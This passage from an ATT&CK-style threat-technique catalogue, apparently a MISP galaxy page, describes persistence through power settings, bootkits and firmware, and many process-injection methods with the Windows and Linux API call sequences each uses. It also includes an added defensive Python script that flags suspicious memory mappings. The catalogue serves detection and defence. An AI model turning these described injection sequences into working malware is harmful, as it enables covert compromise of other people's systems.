Adversaries may abuse system utilities and configuration settings to maintain access by preventing machines from entering a state, such as standby, that can terminate malicious activity.<sup>[[Microsoft: Powercfg command-line options](https://app.tidalcyber.com/references/d9b5be77-5e44-5786-a683-82642b8dd8c9)]</sup><sup>[[systemdsleep Linux](https://app.tidalcyber.com/references/9537f6f9-1521-5c21-b14f-ac459a2d1b70)]</sup>

For example, powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.<sup>[[Two New Monero Malware Attacks Target Windows and Android Users](https://app.tidalcyber.com/references/a797397b-2af7-58b9-b66a-5ded260659f0)]</sup> Adversaries may also extend system lock screen timeout settings.<sup>[[BATLOADER: The Evasive Downloader Malware](https://app.tidalcyber.com/references/53e12ade-99ed-51ee-b5c8-32180f144658)]</sup> Other relevant settings, such as disk and hibernate timeout, can be similarly abused to keep the infected machine running even if no user is active.<sup>[[CoinLoader: A Sophisticated Malware Loader Campaign](https://app.tidalcyber.com/references/83469ab3-0199-5679-aa25-7b6885019552)]</sup>

Aware that some malware cannot survive system reboots, adversaries may entirely delete files used to invoke system shut down or reboot.<sup>[[Condi-Botnet-binaries](https://app.tidalcyber.com/references/a92b0d6c-b3e8-56a4-b1b4-1d117e59db84)]</sup>

The tag is: misp-galaxy:technique="Power Settings"

Bootkit

Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.

A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). <sup>[[Mandiant M Trends 2016](https://app.tidalcyber.com/references/f769a3ac-4330-46b7-bed8-61697e22cd24)]</sup> The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. <sup>[[Lau 2011](https://app.tidalcyber.com/references/fa809aab-5051-4f9c-8e27-b5989608b03c)]</sup>

The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.

The tag is: misp-galaxy:technique="Bootkit"

Component Firmware

Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://app.tidalcyber.com/technique/4050dbda-5cb0-4bd6-8444-841e55611f3a) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.

Malicious component firmware can provide a persistent level of access to systems that survives typical remediation steps such as losing other footholds or re-imaging the hard disk, as well as a way to evade host software-based defenses and integrity checks.

The tag is: misp-galaxy:technique="Component Firmware"

ROMMONkit

Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. <sup>[[Cisco Synful Knock Evolution](https://app.tidalcyber.com/references/29301297-8343-4f75-8096-7fe229812f75)]</sup><sup>[[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]</sup>

ROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to [TFTP Boot](https://app.tidalcyber.com/technique/6f2186f3-c798-46e8-a26f-ae033822837b), an adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect.

The tag is: misp-galaxy:technique="ROMMONkit"

System Firmware

Adversaries may modify system firmware to persist on systems. The BIOS (Basic Input/Output System) and the Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. <sup>[[Wikipedia BIOS](https://app.tidalcyber.com/references/0c4a2cb3-d663-47ee-87af-c5e9e68fe15f)]</sup> <sup>[[Wikipedia UEFI](https://app.tidalcyber.com/references/681c6a57-76db-410b-82d6-4e614bcdb6e0)]</sup> <sup>[[About UEFI](https://app.tidalcyber.com/references/2e6fe82c-d90f-42b6-8247-397ab8823c7c)]</sup>

System firmware like BIOS and (U)EFI underlie the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a form of persistence on a system that may be difficult to detect.

The tag is: misp-galaxy:technique="System Firmware"

TFTP Boot

Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.

Adversaries may manipulate the configuration on the network device to specify use of a malicious TFTP server, which may be used in conjunction with [Modify System Image](https://app.tidalcyber.com/technique/f435a5ff-78d2-44de-b464-2b5528f94adc) to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of standard functionality. This technique is similar to [ROMMONkit](https://app.tidalcyber.com/technique/b9d60848-388e-444c-9f22-2267ea61b5e9) and may result in the network device running a modified image. <sup>[[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]</sup>

The tag is: misp-galaxy:technique="TFTP Boot"

Pre-OS Boot

Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.<sup>[[Wikipedia Booting](https://app.tidalcyber.com/references/6d9c72cb-6cda-445e-89ea-7e695063d49a)]</sup>

Adversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output System) and the Unified Extensible Firmware Interface (UEFI) to persist on systems at a layer below the operating system. This can be particularly difficult to detect, as malware at this level will not be detected by host software-based defenses.

The tag is: misp-galaxy:technique="Pre-OS Boot"

Process Discovery

Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://app.tidalcyber.com/technique/710ae610-0556-44e5-9de9-8be6159a23dd) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://app.tidalcyber.com/software/abae8f19-9497-4a71-82b6-ae6edd26ad98) utility via [cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) or <code>Get-Process</code> via [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde). Information about processes can also be extracted from the output of [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) calls such as <code>CreateToolhelp32Snapshot</code>. On macOS and Linux, this is accomplished with the <code>ps</code> command. Adversaries may also opt to enumerate processes via /proc.

On network devices, [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as show processes can be used to display current running processes.<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup><sup>[[show_processes_cisco_cmd](https://app.tidalcyber.com/references/944e529b-5e8a-54a1-b205-71dcb7dd304f)]</sup>

The tag is: misp-galaxy:technique="Process Discovery"

Asynchronous Procedure Call

Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges. APC injection is a method of executing arbitrary code in the address space of a separate live process.

APC injection is commonly performed by attaching malicious code to the APC queue <sup>[[Microsoft APC](https://app.tidalcyber.com/references/37f1ef6c-fc0e-4e47-85ab-20d53caba77e)]</sup> of a process’s thread. Queued APC functions are executed when the thread enters an alertable state.<sup>[[Microsoft APC](https://app.tidalcyber.com/references/37f1ef6c-fc0e-4e47-85ab-20d53caba77e)]</sup> A handle to a thread of an existing victim process is first obtained with native Windows API calls such as <code>OpenThread</code>. At this point <code>QueueUserAPC</code> can be used to invoke a function (such as <code>LoadLibraryA</code> pointing to a malicious DLL).

A variation of APC injection, dubbed "Early Bird injection", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. <sup>[[CyberBit Early Bird Apr 2018](https://app.tidalcyber.com/references/8ae4ec67-518e-46dd-872c-7e2a9ca4ef13)]</sup> AtomBombing <sup>[[ENSIL AtomBombing Oct 2016](https://app.tidalcyber.com/references/9282dbab-391c-4ffd-ada9-1687413b686b)]</sup> is another variation that utilizes APCs to invoke malicious code previously written to the global atom table.<sup>[[Microsoft Atom Table](https://app.tidalcyber.com/references/a22636c8-8e39-4583-93ef-f0b7f0a218d8)]</sup>

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via APC injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:technique="Asynchronous Procedure Call"

Dynamic-link Library Injection

Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process.

DLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as <code>VirtualAllocEx</code> and <code>WriteProcessMemory</code>, then invoked with <code>CreateRemoteThread</code> (which calls the <code>LoadLibrary</code> API responsible for loading the DLL). <sup>[[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)]</sup>

Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (mapping the DLL while writing it into the process) overcome the address relocation issue as well as the need for additional APIs to invoke execution (since these methods load and execute the files in memory by manually performing the function of <code>LoadLibrary</code>).<sup>[[Elastic HuntingNMemory June 2017](https://app.tidalcyber.com/references/8cd58716-4ff1-4ba2-b980-32c52cf7dee8)]</sup><sup>[[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)]</sup>

Another variation of this method, often referred to as Module Stomping/Overloading or DLL Hollowing, may be leveraged to conceal injected code within a process. This method involves loading a legitimate DLL into a remote process then manually overwriting the module’s <code>AddressOfEntryPoint</code> before starting a new thread in the target process.<sup>[[Module Stomping for Shellcode Injection](https://app.tidalcyber.com/references/0f9b58e2-2a81-4b79-aad6-b36a844cf1c6)]</sup> This variation allows attackers to hide malicious injected code by potentially backing its execution with a legitimate DLL file on disk.<sup>[[Hiding Malicious Code with Module Stomping](https://app.tidalcyber.com/references/88983d22-980d-4442-858a-3b70ec485b94)]</sup>

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:technique="Dynamic-link Library Injection"

Extra Window Memory Injection

Adversaries may inject malicious code into a process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.

Before creating a window, graphical Windows-based processes must subscribe to or register a window class, which stipulates appearance and behavior (via window procedures, which are functions that handle input/output of data).<sup>[[Microsoft Window Classes](https://app.tidalcyber.com/references/cc620fcd-1f4a-4670-84b5-3f12c9b85053)]</sup> Registration of new window classes can include a request for up to 40 bytes of EWM to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. <sup>[[Microsoft GetWindowLong function](https://app.tidalcyber.com/references/4366217a-2325-4056-ab68-f5f4d2a0703c)]</sup> <sup>[[Microsoft SetWindowLong function](https://app.tidalcyber.com/references/11755d06-a9df-4a19-a165-2995f25c4b12)]</sup>

Although small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process’s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process’s EWM.

Execution granted through EWM injection may allow access to both the target process’s memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as <code>WriteProcessMemory</code> and <code>CreateRemoteThread</code>.<sup>[[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)]</sup> More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process. <sup>[[MalwareTech Power Loader Aug 2013](https://app.tidalcyber.com/references/9a9a6ca1-d7c5-4385-924b-cdeffd66602e)]</sup> <sup>[[WeLiveSecurity Gapz and Redyms Mar 2013](https://app.tidalcyber.com/references/b8d328b7-2eb3-4851-8d44-2e1bad7710c2)]</sup>

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:technique="Extra Window Memory Injection"

ListPlanting

Adversaries may abuse list-view controls to inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. ListPlanting is a method of executing arbitrary code in the address space of a separate live process. Code executed via ListPlanting may also evade detection from security products since the execution is masked under a legitimate process.

List-view controls are user interface windows used to display collections of items.<sup>[[Microsoft List View Controls](https://app.tidalcyber.com/references/7d6c6ba6-cda6-4f27-bfc8-af5b759305ed)]</sup> Information about an application’s list-view settings is stored within the process' memory in a <code>SysListView32</code> control.

ListPlanting (a form of message-passing "shatter attack") may be performed by copying code into the virtual address space of a process that uses a list-view control then using that code as a custom callback for sorting the listed items.<sup>[[Modexp Windows Process Injection](https://app.tidalcyber.com/references/1bf45166-bfce-450e-87d1-b1e3b19fdb62)]</sup> Adversaries must first copy code into the target process’ memory space, which can be performed various ways including by directly obtaining a handle to the <code>SysListView32</code> child of the victim process window (via Windows API calls such as <code>FindWindow</code> and/or <code>EnumWindows</code>) or other [Process Injection](https://app.tidalcyber.com/technique/7a6208ac-c75e-4e73-8969-0aaf6085cb6e) methods.

Some variations of ListPlanting may allocate memory in the target process but then use window messages to copy the payload, to avoid the use of the highly monitored <code>WriteProcessMemory</code> function. For example, an adversary can use the <code>PostMessage</code> and/or <code>SendMessage</code> API functions to send <code>LVM_SETITEMPOSITION</code> and <code>LVM_GETITEMPOSITION</code> messages, effectively copying a payload 2 bytes at a time to the allocated memory.<sup>[[ESET InvisiMole June 2020](https://app.tidalcyber.com/references/d10cfda8-8fd8-4ada-8c61-dba6065b0bac)]</sup>

Finally, the payload is triggered by sending the <code>LVM_SORTITEMS</code> message to the <code>SysListView32</code> child of the process window, with the payload within the newly allocated buffer passed and executed as the <code>ListView_SortItems</code> callback.

The tag is: misp-galaxy:technique="ListPlanting"

Portable Executable Injection

Adversaries may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges. PE injection is a method of executing arbitrary code in the address space of a separate live process.

PE injection is commonly performed by copying code (perhaps without a file on disk) into the virtual address space of the target process before invoking it via a new thread. The write can be performed with native Windows API calls such as <code>VirtualAllocEx</code> and <code>WriteProcessMemory</code>, then invoked with <code>CreateRemoteThread</code> or additional code (ex: shellcode). The displacement of the injected code does introduce the additional requirement for functionality to remap memory references. <sup>[[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)]</sup>

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via PE injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:technique="Portable Executable Injection"

Process Doppelgänging

Adversaries may inject malicious code into a process via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelgänging is a method of executing arbitrary code in the address space of a separate live process.

Windows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. <sup>[[Microsoft TxF](https://app.tidalcyber.com/references/f7f2eecc-19e6-4d93-8a53-91afea2f242e)]</sup> To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. <sup>[[Microsoft Basic TxF Concepts](https://app.tidalcyber.com/references/72798536-a7e3-43e2-84e3-b5b8b54f0bca)]</sup> To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. <sup>[[Microsoft Where to use TxF](https://app.tidalcyber.com/references/f315072c-67cb-4166-aa18-8e92e00ef7e8)]</sup>

Although deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. <sup>[[BlackHat Process Doppelgänging Dec 2017](https://app.tidalcyber.com/references/b0752c3a-1777-4209-938d-5382de6a49f5)]</sup>

Adversaries may abuse TxF to perform a fileless variation of [Process Injection](https://app.tidalcyber.com/technique/7a6208ac-c75e-4e73-8969-0aaf6085cb6e). Similar to [Process Hollowing](https://app.tidalcyber.com/technique/77100337-67a1-4520-b25a-3ddd72b0d5ac), process doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process doppelgänging’s use of TxF also avoids the use of highly monitored API functions such as <code>NtUnmapViewOfSection</code>, <code>VirtualProtectEx</code>, and <code>SetThreadContext</code>. <sup>[[BlackHat Process Doppelgänging Dec 2017](https://app.tidalcyber.com/references/b0752c3a-1777-4209-938d-5382de6a49f5)]</sup>

Process Doppelgänging is implemented in 4 steps <sup>[[BlackHat Process Doppelgänging Dec 2017](https://app.tidalcyber.com/references/b0752c3a-1777-4209-938d-5382de6a49f5)]</sup>:

  • Transact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.

  • Load – Create a shared section of memory and load the malicious executable.

  • Rollback – Undo changes to original executable, effectively removing malicious code from the file system.

  • Animate – Create a process from the tainted section of memory and initiate execution.

This behavior will likely not result in elevated privileges, since the injected process was spawned from (and thus inherits the security context of) the injecting process. However, execution via process doppelgänging may evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:technique="Process Doppelgänging"

Process Hollowing

Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process.

Process hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as <code>CreateProcess</code>, which includes a flag to suspend the process’s primary thread. At this point the process can be unmapped using API calls such as <code>ZwUnmapViewOfSection</code> or <code>NtUnmapViewOfSection</code> before being written to, realigned to the injected code, and resumed via <code>VirtualAllocEx</code>, <code>WriteProcessMemory</code>, <code>SetThreadContext</code>, then <code>ResumeThread</code> respectively.<sup>[[Leitch Hollowing](https://app.tidalcyber.com/references/8feb180a-bfad-42cb-b8ee-792c5088567a)]</sup><sup>[[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)]</sup>

This is very similar to [Thread Local Storage](https://app.tidalcyber.com/technique/24e0b530-cca7-4c5c-83b2-97b83c716e42) but creates a new process rather than targeting an existing process. This behavior will likely not result in elevated privileges, since the injected process was spawned from (and thus inherits the security context of) the injecting process. However, execution via process hollowing may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:technique="Process Hollowing"

Proc Memory

Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process.

Proc memory injection involves enumerating the memory of a process via the /proc filesystem (<code>/proc/[pid]</code>) then crafting a return-oriented programming (ROP) payload with available gadgets/instructions. Each running process has its own directory, which includes memory mappings. Proc memory injection is commonly performed by overwriting the target process’s stack using memory mappings provided by the /proc filesystem. This information can be used to enumerate offsets (including the stack) and gadgets (instructions within the program that can be chained to build a malicious payload) otherwise hidden by process memory protections such as address space layout randomization (ASLR). Once enumerated, the target process’s memory map within <code>/proc/[pid]/maps</code> can be overwritten using dd.<sup>[[Uninformed Needle](https://app.tidalcyber.com/references/5ac2d917-756f-48d0-ab32-648b45a29083)]</sup><sup>[[GDS Linux Injection](https://app.tidalcyber.com/references/3e7f5991-25b4-43e9-9f0b-a5c668fb0657)]</sup><sup>[[DD Man](https://app.tidalcyber.com/references/f64bee0d-e37d-45d5-9968-58e622e89bfe)]</sup>

Other techniques such as [Dynamic Linker Hijacking](https://app.tidalcyber.com/technique/b0d884c3-cf87-4610-992d-4ec54c667759) may be used to populate a target process with more available gadgets. Similar to [Process Hollowing](https://app.tidalcyber.com/technique/77100337-67a1-4520-b25a-3ddd72b0d5ac), proc memory injection may target child processes (such as a backgrounded copy of sleep).<sup>[[GDS Linux Injection](https://app.tidalcyber.com/references/3e7f5991-25b4-43e9-9f0b-a5c668fb0657)]</sup>

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via proc memory injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:technique="Proc Memory"

Ptrace System Calls

Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process.

Ptrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values.<sup>[[PTRACE man](https://app.tidalcyber.com/references/fc5e63e7-090a-441b-8e34-9946e1840b49)]</sup> Ptrace system call injection is commonly performed by writing arbitrary code into a running process (ex: <code>malloc</code>) then invoking that memory with <code>PTRACE_SETREGS</code> to set the register containing the next instruction to execute. Ptrace system call injection can also be done with <code>PTRACE_POKETEXT</code>/<code>PTRACE_POKEDATA</code>, which copy data to a specific address in the target process’s memory (ex: the current address of the next instruction). <sup>[[PTRACE man](https://app.tidalcyber.com/references/fc5e63e7-090a-441b-8e34-9946e1840b49)]</sup><sup>[[Medium Ptrace JUL 2018](https://app.tidalcyber.com/references/6dbfe4b5-9430-431b-927e-e8e775874cd9)]</sup>

Ptrace system call injection may not be possible against processes that are not child processes and/or have higher privileges.<sup>[[BH Linux Inject](https://app.tidalcyber.com/references/bdbb2a83-fc3b-439f-896a-75bffada4d51)]</sup>

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:technique="Ptrace System Calls"

Thread Execution Hijacking

Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the address space of a separate live process.

Thread Execution Hijacking is commonly performed by suspending an existing process then unmapping/hollowing its memory, which can then be replaced with malicious code or the path to a DLL. A handle to a thread of an existing victim process is first obtained with native Windows API calls such as <code>OpenThread</code>. At this point the thread can be suspended then written to, realigned to the injected code, and resumed via <code>SuspendThread</code>, <code>VirtualAllocEx</code>, <code>WriteProcessMemory</code>, <code>SetThreadContext</code>, then <code>ResumeThread</code> respectively.<sup>[[Elastic Process Injection July 2017](https://app.tidalcyber.com/references/02c9100d-27eb-4f2f-b302-adf890055546)]</sup>

This is very similar to [Process Hollowing](https://app.tidalcyber.com/technique/77100337-67a1-4520-b25a-3ddd72b0d5ac) but targets an existing process rather than creating a process in a suspended state.

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via Thread Execution Hijacking may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:technique="Thread Execution Hijacking"

Thread Local Storage

Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges. TLS callback injection is a method of executing arbitrary code in the address space of a separate live process.

TLS callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code’s legitimate entry point. TLS callbacks are normally used by the OS to set up and/or clean up data used by threads. Manipulating TLS callbacks may be performed by allocating and writing to specific offsets within a process’ memory space using other [Process Injection](https://app.tidalcyber.com/technique/7a6208ac-c75e-4e73-8969-0aaf6085cb6e) techniques such as [Process Hollowing](https://app.tidalcyber.com/technique/77100337-67a1-4520-b25a-3ddd72b0d5ac).<sup>[[FireEye TLS Nov 2017](https://app.tidalcyber.com/references/9737055a-f583-448e-84d0-1d336c4da9a8)]</sup>

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via TLS callback injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:technique="Thread Local Storage"

VDSO Hijacking

Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process.

VDSO hijacking involves redirecting calls to dynamically linked shared libraries. Memory protections may prevent writing executable code to a process via [Ptrace System Calls](https://app.tidalcyber.com/technique/e200d4c9-2d9c-4303-a2de-86baae85c60f). However, an adversary may hijack the syscall interface code stubs mapped into a process from the vdso shared object to execute syscalls that open and map a malicious shared object. This code can then be invoked by redirecting the execution flow of the process via patched memory address references stored in a process' global offset table (which stores absolute addresses of mapped library functions).<sup>[[ELF Injection May 2009](https://app.tidalcyber.com/references/3ca314d4-3fcf-4545-8ae9-4d8781d51295)]</sup><sup>[[Backtrace VDSO](https://app.tidalcyber.com/references/1c8fa804-6579-4e68-a0b3-d16e0bee5654)]</sup><sup>[[VDSO Aug 2005](https://app.tidalcyber.com/references/ae70f799-ebb6-4ffe-898e-945cb754c1cb)]</sup><sup>[[Syscall 2014](https://app.tidalcyber.com/references/4e8fe849-ab1a-4c51-b5eb-16fcd10e8bd0)]</sup>

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:technique="VDSO Hijacking"
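The Linux injection entries above (Proc Memory, Ptrace System Calls, VDSO Hijacking) all leave traces in a process's memory map. The following is an added defender-side check, not code from the MISP galaxy page: it parses the `/proc/[pid]/maps` format and flags regions that are writable and executable at once, executable but backed by no file, or executable and backed by a file in a temporary path. The maps text is a constructed sample; the `TEMP_PREFIXES` list and the reason strings are this example's own choices.

```python
"""Flag suspicious memory mappings from a Linux /proc/[pid]/maps listing.

Added example, not code from the MISP galaxy page. JIT runtimes can
legitimately produce RWX regions, so treat hits as triage leads, not verdicts.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple

# One maps line: address-range perms offset dev inode [pathname]
MAPS_LINE = re.compile(
    r"^(?P<start>[0-9a-f]+)-(?P<end>[0-9a-f]+)\s+(?P<perms>[rwxsp-]{4})\s+"
    r"(?P<offset>[0-9a-f]+)\s+(?P<dev>[0-9a-f]+:[0-9a-f]+)\s+(?P<inode>\d+)"
    r"\s*(?P<path>.*)$"
)

RWX = "writable+executable region"
ANON_EXEC = "anonymous executable region"
TMP_EXEC = "executable mapping backed by a file in a temporary path"

# Paths where a legitimately loaded library should not live (assumption, tune per host)
TEMP_PREFIXES = ("/tmp/", "/dev/shm/", "/var/tmp/")


@dataclass
class Mapping:
    start: int
    end: int
    perms: str
    inode: int
    path: str


def parse_maps(text: str) -> List[Mapping]:
    """Parse /proc/[pid]/maps text into Mapping records."""
    mappings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = MAPS_LINE.match(line)
        if not m:
            raise ValueError(f"unparseable maps line: {line!r}")
        mappings.append(Mapping(int(m["start"], 16), int(m["end"], 16),
                                m["perms"], int(m["inode"]), m["path"].strip()))
    return mappings


def find_suspicious(mappings: List[Mapping]) -> List[Tuple[Mapping, str]]:
    """Return (mapping, reason) for each region a defender should look at."""
    findings = []
    for mp in mappings:
        executable = "x" in mp.perms
        writable = "w" in mp.perms
        # Kernel pseudo-mappings ([vdso], [stack], ...) have inode 0 but carry a
        # bracketed name; "anonymous" here means no name at all.
        anonymous = mp.inode == 0 and mp.path == ""
        if executable and writable:
            findings.append((mp, RWX))   # also catches an executable [stack]
        elif executable and mp.path.startswith(TEMP_PREFIXES):
            findings.append((mp, TMP_EXEC))
        elif executable and anonymous:
            findings.append((mp, ANON_EXEC))
    return findings


# Constructed sample: a 'sleep' process after code has been injected into it.
SAMPLE_MAPS = """\
55d0c0a00000-55d0c0a01000 r--p 00000000 fd:01 1310729                    /usr/bin/sleep
55d0c0a01000-55d0c0a05000 r-xp 00001000 fd:01 1310729                    /usr/bin/sleep
55d0c1b2a000-55d0c1b4b000 rw-p 00000000 00:00 0                          [heap]
7f2e4c000000-7f2e4c021000 rwxp 00000000 00:00 0
7f2e4c400000-7f2e4c42a000 r-xp 00000000 fd:01 1179651                    /dev/shm/libx.so
7f2e4c600000-7f2e4c602000 r--p 00000000 00:00 0                          [vvar]
7f2e4c602000-7f2e4c604000 r-xp 00000000 00:00 0                          [vdso]
7f2e4c800000-7f2e4c801000 r-xp 00000000 00:00 0
7ffd6a1c0000-7ffd6a1e1000 rw-p 00000000 00:00 0                          [stack]
"""


def scan_text(text: str) -> List[Tuple[str, str]]:
    """Convenience wrapper: returns (hex start address, reason) pairs."""
    return [(f"{mp.start:x}", reason) for mp, reason in find_suspicious(parse_maps(text))]


if __name__ == "__main__":
    for addr, reason in scan_text(SAMPLE_MAPS):
        print(f"{addr}: {reason}")
```

On a live host the same function can be fed `open(f"/proc/{pid}/maps").read()` for each pid of interest; the unmodified `[vdso]` and file-backed `sleep` text segments in the sample are correctly left alone.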

Process Injection

Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.

There are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific.

More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel.

The tag is: misp-galaxy:technique="Process Injection"

Protocol Tunneling

